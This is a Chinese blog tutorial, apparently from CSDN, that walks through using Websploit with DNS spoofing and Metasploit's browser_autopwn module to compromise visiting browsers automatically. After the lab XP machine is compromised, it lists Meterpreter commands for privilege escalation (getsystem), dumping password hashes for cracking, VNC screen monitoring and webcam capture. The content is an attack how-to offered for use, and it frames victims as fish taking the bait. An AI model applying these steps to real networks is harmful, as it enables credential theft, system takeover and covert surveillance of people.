本文介绍如何利用Websploit结合DNS欺骗及Metasploit的browser_autopwn模块实现自动化渗透测试流程。通过终端操作Websploit, 设置并运行模块, 实现对目标系统的自动攻击, 获取系统权限、账户密码hash值等敏感信息。
原理为 websploit调用dnsdpoof进行dns欺骗配合神器metasploit的web_autopwn模块进行渗透;特点:过程基本全自动。
终端输入websploit打开websploit;输入show modules查看所有模块:
查看到有exploit/browser_autopwn模块和exploit/java_applet模块可以使用(新版metasploit去掉了exploit/autopwn模块);这里以exploit/browser_autopwn模块为例:
设置好之后输入run开始运行,然后就等着鱼儿上钩了(这两个功能完全可以单独手动配置的,这里websploit将其组合了起来):
这是虚拟机里xp测试系统打开网页之后:
getsystem #获取sytem权限
hashdump #抓取账户密码hash值 ,然后用ophcrack破解
run vnc #远程连接,监控屏幕
run webcam -p /var/www/ #监控摄像头
background #不退出此meterpreter并返回msf
。。。
视频:
清晰版视频下载地址:http://pan.baidu.com/s/1o6AYkK6
http://v.youku.com/v_show/id_XNjUxMjM2OTQ0.html
扫一扫
1712
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
